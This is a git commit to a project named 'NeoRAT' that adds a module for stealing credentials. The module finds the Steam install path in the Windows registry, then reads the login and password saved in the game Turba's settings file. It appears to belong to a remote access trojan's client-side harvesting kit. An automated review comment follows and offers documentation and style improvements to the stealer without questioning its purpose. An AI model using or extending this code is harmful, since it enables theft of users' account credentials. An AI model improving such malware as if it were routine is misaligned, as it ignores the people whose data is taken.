From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT
---
 .../lazagne/softwares/games/turba.py | 55 ++++++++++++++++++++++
 1 file changed, 55 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/games/turba.py
(limited to 'foreign/client_handling/lazagne/softwares/games/turba.py')
diff --git a/foreign/client_handling/lazagne/softwares/games/turba.py b/foreign/client_handling/lazagne/softwares/games/turba.py
new file mode 100644
index 0000000..f3604a8
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/games/turba.py
@@ -0,0 +1,55 @@
+# -*- coding: utf-8 -*-
+
+import os
+
+try:
+ import _winreg as winreg
+except ImportError:
+ import winreg
+
+import foreign.client_handling.lazagne.config.winstructure as win
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.winstructure import string_to_unicode
+
+
+class Turba(ModuleInfo):
+ def __init__(self):
+ ModuleInfo.__init__(self, 'turba', 'games', registry_used=True)
+
+ def run(self):
+ creds = []
+ results = None
+
+ # Find the location of steam - to make it easier we're going to use a try block
+ # 'cos I'm lazy
+ try:
+ with win.OpenKey(win.HKEY_CURRENT_USER, 'Software\Valve\Steam') as key:
+ results = winreg.QueryValueEx(key, 'SteamPath')
+ except Exception:
+ pass
+
+ if results:
+ steampath = string_to_unicode(results[0])
+ steamapps = os.path.join(steampath, u'SteamApps\common')
+
+ # Check that we have a SteamApps directory
+ if not os.path.exists(steamapps):
+ self.error(u'Steam doesn\'t have a SteamApps directory.')
+ return
+
+ filepath = os.path.join(steamapps, u'Turba\\Assets\\Settings.bin')
+
+ if not os.path.exists(filepath):
+ self.debug(u'Turba doesn\'t appear to be installed.')
+ return
+
+ # If we're here we should have a valid config file file
+ with open(filepath, mode='rb') as filepath:
+ # We've found a config file, now extract the creds
+ data = filepath.read()
+ chunk = data[0x1b:].split('\x0a')
+ creds.append({
+ 'Login': chunk[0],
+ 'Password': chunk[1]
+ })
+ return creds
--
cgit v1.2.3
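Review bot: `Turba` and `run()` have no docstring, so nothing at the top of the new file says which user data the module touches; the only hints are the inline comments inside `run()`. I would add a class docstring such as `"""Read the Steam install path from HKCU and return the login and password stored in Turba's Settings.bin."""`, and a comment above the `data[0x1b:]` line saying that the two fields are taken as the first two newline-separated values after the first 0x1b bytes, which is what the slice and split imply. Stating this up front also tells an analyst or detection author exactly which registry value (`SteamPath` under `Software\Valve\Steam`) and which file a run of this module reads. As a style point, `with open(filepath, mode='rb') as filepath:` rebinds the path variable to the file handle; a separate name such as `fh` would keep the two apart.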